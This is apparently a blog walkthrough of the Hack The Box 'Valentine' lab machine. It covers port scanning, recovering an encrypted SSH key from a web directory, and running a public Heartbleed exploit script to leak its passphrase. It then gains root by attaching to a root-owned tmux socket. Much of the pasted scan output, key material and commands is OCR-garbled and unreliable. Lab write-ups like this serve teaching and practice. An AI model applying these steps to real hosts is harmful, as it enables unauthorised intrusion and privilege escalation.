Valentine – No Metasploit

walkthroughs 1 Minute

Alright, let’s get into it. Fire off autorecon and return the portscan results:

22/tcp open ssh I ssh-hostkey: syn-ack tt1 63 OpenSSH 5.9p1 Debian 5ubuntu1.1Ø (Ubuntu Linux; protocol 2.0) 1024 (DSA) ssh-dss AAAAB3NzaC1kc3MAAACBAIMeSqrDdAOhxf7PIIDtdRqunøp09pmUi+474hX6LHkDgC9dzcvEGyMB/cuuCCjfXn6QD vy72rbFkSTm1MuUFQDvNVA5vTpfj5pUCUN Fyvnhy3TdcQAAAIBFqVHk74m1T3PWKSpWcZv11KCGg5rGCCE5B3 j RWEbR08CPRkw s ba /BP8Uf c u PM+WGWKxj u a OJ t 6 j eD8iQAAAIBg9 rgf8N ORfGq z i +3 n d UC09 /m+T18pn +0RbCKdFGq 8Ec s 4QLeaXPMRI pCoI 11n 6 2048 (RSA) ssh-rsa gUem2TVIWqStLJ oPxt8i DPPM7929 EoovpooSj wPfq vEhRMtq +KKI q U6PrJD6Hs hGd j Lj ABYYII j fKa kgBfWi C+YOKWKa 9 q d eBFø 256 (ECDSA) I _ecdsa-sha2-nistp256 8Ø/tcp open http syn-ack tt1 63 Apache httpd 2.2.22 ((Ubuntu)) I http-methods: 1_ supported Methods: GET HEAD POST OPTIONS l_http-server-header: Apache/ 2.2.22 (Ubuntu) l_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http syn-ack ttI 63 Apache httpd 2.2.22 ( (Ubuntu)) http-methods : supported Methods: GET HEAD POST OPTIONS l_http-server-header: Apache/ 2.2.22 (Ubuntu) l_http-title: Site doesn't have a title (text/html). ssl-cert: Subject: Issuer: Public Key type: rsa Public Key bits: 2048 Signature Algorithm: shalWithRSAEncryption Not valid before: 2018-02-06Tøø: 45: 25 Not valid after: 2019-02-06Tøø: 45 : 25 at*13 c-«ø b145 2154 fb51+ b2de c7a9 8Ø9d MD5 : SHA-I: 2303 80da 60e7 bde7 2ba6 76dd 5214 3c3c 6f53 Ø1b1

So autorecon has a neat feature where it will further enumerate ports and put them in separate text files. Opening tcp_443_http_nmap.txt shows:

ssl-heartbleed: VULNERABLE : The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for s State: VULNERABLE Risk factor: High OpenSSL versions l.ø.l and 1.Ø.2-beta releases (including l.ø.lf and 1.Ø.2-beta1) of OpenSSL are affected by the by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as

The gobuster output on port 443 shows:

(decode (Status: 200) [Size: 552] (decode. php (Status: 200) [Size: 552] (dev (Status: 301) [Size: 310] (encode (Status: 200) [Size: 554] /encode.php (Status: 200) [Size: 554] / index (Status: 200) [Size: 38] / index.php (Status: 200) [Size: 38] / index.php (Status: 200) [Size: 38]

Port 80 shows the same:

(decode (Status: 200) [Size: 552] /decode.php (Status: 200) [Size: 552] (dev (Status: 301) [Size: 308] (encode (Status: 200) [Size: 554] (encode. php (Status: 200) [Size: 554] / index (Status: 200) [Size: 38] / index.php (Status: 200) [Size: 38] / index.php (Status: 200) [Size: 38]

Looking at the actual website and poking around we don’t see much:

/decode and /encode.php don’t show much either. However, going to /dev/ we see something interesting:

And hype_key:

So this is pretty obviously hex code. Copy that file onto your box and run xxd on it to read what it says:

. "Documents/htb/valentine$ cat hype_key I xxd --BEGIN RSA PRIVATE KEY----- Proc-Type: 4, ENCRYPTED DEK-1nfo: AES-128-CBC,AEB88CIWF69BF2ø74788DE24AE48D46 DbPr078kegNuk1DAq1AN5jbjxvøPPsog3jdbMFS8iE9p3UOLø1Føxf7PzmrkDa8R 5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/MyOO%x+a16 DEIOSb0YUAVIW4EV7m96QszjrwJvnjvafm6VsKaTPBHpugcASvMqz76W6abRZeXi Ebw66h j FmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8z1as6fcmhM8A+8P OXBKNe6117hKaT6wFnp5eXOaUIHvHnv06ScHVWRrZ7øfcpcpimL1w13Tgdd2AiGd pHLJpYU115Pu06x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKe09DsTRqs2k1SH Qd1W'FwaXbYyT1uxAMS15Hq90D5HJ8GøR6J15RvCNUQjwxøFITj jMjnL1pxjvfq+E Km6rCZqacwnSddHW8W3Lx JmCxdxW51 t5dPjAkBYRUn191 ESCi D4Z+uC t 9 grSos RTCs Zdl 40Pts pKxMMOs gn ox vnI POSwSpWy 9Wp6y8XX8+F 4ørx15 XqhDUBhyk1C3YPOiDuPOnMXa1pe1dgbONdDIM9ZQSNULw1DHCGPP4JSSxX7BWdDK aAnWJvFg1A40FBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ +wQ871Madds1GQNeGsKSf8R/rsRKeeKci1 De PC j eaLq tqxnhNoFtgøMxt6r2gb1E AIOQ6j g5Tbj 5 J 7 Np9GVpi nPc3KpHttvgbpt fiWEEsZYn5yZPhUr9Q rø8pkOxArXE2dj7eX+bq656350J6TqHbAITQIRs9Pu1rS7K4SLX7nY89/RZ50SQe 2VURyTZ1 FfngJSsv9+Mfvz3411 bzOIWmk7WfEcWcHc16n 9VOIbSNALn jThvEcPky el Bs fSbs f9 F gu UZkgHAnn fRKkGVGIOVy uwc / LV jmbhZzKwLhaZRNd8HEM86fNoj P 09nVjTaYtWUXkOSi1W02wbu1NzL+1Tg91pNy1SFCFYjSqiyG+WU71wK3YU5kp3CC dYScz63Q2pQa fx fSbu v4CMnNpdi rVKE05nRRfK/i aL3X1 R3DxV8eSYFKFL6pqpuX cY5YZJGAP+JxsnIQ9CFyxIt92frXznsjh1Ya8svbVNNfk/9fyX60p24rL2DyESpY pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrP+VuPqaqDvMCVe1DZCb4MjAj Ms I f+9xK+TXEL3i cmIOBRdPyw6e/ JIQIVRImShFp18eb/8VsTyJSe+b853zuV2qL suLaBMxYKm3+zEDIDveKPNaaWZgEcqxy1CC/wUyUXIMJ5øNw6JNVW8LeCii30EW 101n9L1b/NXpHjGa8WHHTj01i1B5qNUyywSeTBF2awRIXH9BrkZG4Fc4gdmW/1zT RUgZkbMQZN11fzj1Qui1RVBm/F76Y/YMrmnM9k/1xSG1skwCUQ+95CGHJE8MkhD3 -kal iö)hvd3 . "Documents/htb/valentine$ --END RSA PRIVATE KEY----

Looks like it’s an ssh key for… hype?

Well, let’s try to login with it.

kaliöhyd3 . —"Documents/htb/valentine$ chmod 600 hype_key_decoded kaliöhyd3 . —"Documents/htb/valentine$ ssh -i hype_key_decoded hypeö1ø.1ø.1ø.79 Enter passphrase for key 'hype_key_decoded'

Ok… so we need a passphrase

Heartbleed has been known to leak information… let’s see if we can find something on git to help extract this info

This python script allows us to exploit the heartbleed bug: https://raw.githubusercontent.com/roflcer/heartbleed-vuln/master/attack.py

After supplying the required params, we get something back that looks like base64:

kaliöhyd3 . —"Documents/htb/valentine$ chmod 755 attack.py kaliöhyd3: —"Documents/htb/valentine$ python2 attack.py 10.1Ø.1Ø.79 -I ØX4ØØ1 defribulator VI.2ø A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2ø14-ø16ø) Connecting to: 10.10.10.79:443, 1 times Sending Client Hello for TLSv1.ø Analyze the result.... Analyze the result.... Analyze the result.... Analyze the result.... Received Server Hello for TLSv1.ø 'Analyze the result.... WARNING: 10.10.10.79:443 returned more data than it should - Please wait... connection attempt 1 of 1 . a. muuuuuuuuuuABCDEFGHIJKLMNOABC... ....3.2....... / A ....ø.ø.l/decode.php Content-Type: application/x-www-form-urlencoded I Content-Length: 42 server is vulnerable!

Decode that string and you get a potential password

Let’s try to ssh in again…

kalijhyd3 . "Documents/htb/valentine$ ssh -i hype_key_decoded hypeö1ø.1ø.1ø.79 Enter passphrase for key ' Welcome to Ubuntu 12.04 L TS (GNU/Linux 3.2.ø-23-generic x86_64) * Documentation: https://help.ubuntu.com/ New release '14.04.5 LTS' available. -upgrade' to upgrade to it. Run ' do-release , Last login: Fri Feb 16 2018 from 10.10.14.3 whoami hype hostname Valentine

Alright, now time to Priv Esc. After looking around (A LOT), I realized it’s always good to look at .bash_history, so I did:

hypeöVa1entine:/$ cat exit exot exit bash _ history cd . devs tmux tmux tmux tmux exit -L dev sess a -t dev sess --help -S / .devs/dev_sess
hypeöVaIentine:/$ cd .devs hypeöVa1entine:/.devs$ Is -la total 8 drwxr-xr-x 2 drwxr-xr-x 26 srw-rw-- 1 root root root hype 4096 root 4096 hype May Feb May 28 6 28 08: 48 2018 08:48 dev sess

Running down the list of commands and running: tmux -S /.devs/dev_sess looks like it spawns a tmux session as root

Unknown's avatar

Published by hyd3sec

Published

Leave a comment